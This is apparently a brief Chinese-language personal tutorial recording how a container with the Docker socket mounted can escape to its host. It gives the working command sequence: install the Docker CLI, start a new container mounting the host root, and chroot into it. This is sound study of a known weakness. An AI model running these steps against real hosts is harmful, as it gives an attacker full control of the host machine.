容器逃逸 --with docker.sock

本人對于容器逃逸的基本理解就是用戶從容器中逃出去到宿主機里去了。

本文意在記錄一個使用 docker.sock 來進行容器逃逸的方法。

首先隨便來個鏡像，這里選用 ubuntu:20.04

docker pull ubuntu:20.04
docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock -d ubuntu:20.04

可以看到這里掛載了 docker.sock 到容器內。

進入容器并下載 docker-ce-cli

apt update
apt-get install     ca-certificates     curl     gnupg     lsb-release

mkdir -p /etc/apt/keyrings
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | gpg --dearmor -o /etc/apt/keyrings/docker.gpg

echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \
  $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

apt-get update
apt-get install docker-ce-cli

然后運行一個新的容器：

docker run -it -v /:/host ubuntu:20.04 bash

可以看到這里把根目錄掛載到了新的容器內，要注意這個根目錄可不是當前容器的根目錄，而是當前容器的宿主機的根目錄，在新的容器內，我們執行

chroot /host

這樣就可以在新的容器內直接訪問宿主機的文件系統了，實現了逃逸。